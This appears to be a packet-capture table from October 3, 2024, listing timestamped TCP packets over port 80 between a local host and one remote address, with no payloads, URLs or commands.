Oct 3, 2024 18:38:22.742463112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.742466927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.742484093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.742500067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.742516041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.742527008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.742527008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.742527008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.742569923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.743428946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.743446112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.743459940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.743475914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.743489027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.743505001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.743511915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.743520975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.743536949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.743561983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.743591070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.744157076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.744173050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.744188070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.744201899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.744216919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.744231939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.744240046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.744247913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.744266033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.744278908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.744299889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.744337082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.745012999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745028973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745044947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745057106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745071888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745074987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.745089054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745104074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745119095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745120049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.745132923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745142937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.745167017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.745197058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.745925903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745943069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745960951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745975018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745990038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.745999098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.746005058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746020079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746030092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.746035099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746052027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746066093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746068001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.746085882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.746123075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.746781111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746798038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746813059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746828079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746843100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.746844053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746860981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746870995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.746876955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746893883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746908903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.746910095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.746932983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.746964931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.747725010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.747740984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.747756004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.747771025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.747786045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.747802019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.747806072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.747819901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.747829914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.747836113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.747852087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.747853994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.747886896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.747919083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.748656988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.748673916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.748689890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.748706102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.748718977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.748723984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.748740911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.748745918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.748756886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.748773098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.748785019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.748790026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.748806953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.748825073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.748850107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.749361992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.749377966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.749392986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.749408007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.749419928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.749423027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.749449015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.749481916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.820658922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.820679903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.820698023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.820724964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.820769072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.820899963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.820916891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.820933104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.820949078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.820952892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.820982933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.821017981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.821072102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821088076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821101904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821116924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821118116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.821132898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821139097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.821160078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.821209908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.821615934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821631908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821649075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821661949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821690083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.821712971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.821944952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821960926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821975946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.821990967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822006941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.822041035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.822159052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822175026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822191000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822204113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822208881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.822249889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.822442055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822458029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822490931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822505951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.822505951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822525024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822525978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.822542906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822559118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.822561026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.822597027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.822609901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.832653999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.832670927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.832686901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.832731009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.832768917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.832797050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.832849979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.832860947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.832866907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.832882881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.832897902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.832911968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.832958937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.833302975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.833316088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.833333015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.833348036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.833359003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.833364010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.833389997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.833439112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.833621025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.833705902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.833722115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.833736897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.833745003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.833755016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.833770037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.833806038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.833806038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.834311008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.834326029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.834341049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.834352970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.834367990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.834383965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.834388018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.834398985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.834400892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.834418058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.834434032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.834445000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.834450006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.834465981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.834467888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.834501982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.834533930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.835283041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.835299969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.835314989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.835330009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.835345030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.835355997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.835361958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.835376978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.835401058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.835402966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.835418940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.835433006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.835433960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.835449934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.835458040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.835494041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.836291075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.836308002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.836322069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.836337090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.836349010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.836352110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.836364985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.836380959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.836380959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.836397886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.836414099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.836425066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.836429119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.836448908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.836487055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.837258101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.837275982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.837291002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.837306023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.837316036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.837321997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.837338924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.837343931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.837356091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.837373018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.837384939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.837389946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.837407112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.837423086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.837444067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.838243008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.838259935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.838274002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.838289976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.838304996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.838309050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.838320971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.838334084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.838349104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.838365078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.838365078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.838381052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.838393927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.838397026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.838412046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.838454008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.839212894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839227915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839241028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839257002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839272976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839277983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.839288950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839304924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839318991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839319944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.839334965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839350939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839353085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.839366913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839379072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.839397907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.839432955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.839912891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839931011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839946032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839960098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.839978933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.840003014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.911690950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.911716938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.911732912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.911748886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.911777973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.911864996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.911914110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.911936045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.911952972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.911967993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.911982059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.911986113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.912003040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.912028074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.912318945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.912334919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.912381887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.912405968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.912436008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.912451982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.912466049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.912477970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.912482977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.912498951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.912508011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.912527084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.912561893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.912769079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.912875891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.912889957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.912928104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.912964106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.913110971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913125992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913141012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913156033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.913158894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.913183928 CEST	49730	80	192.168.2.4	185.215.113.37
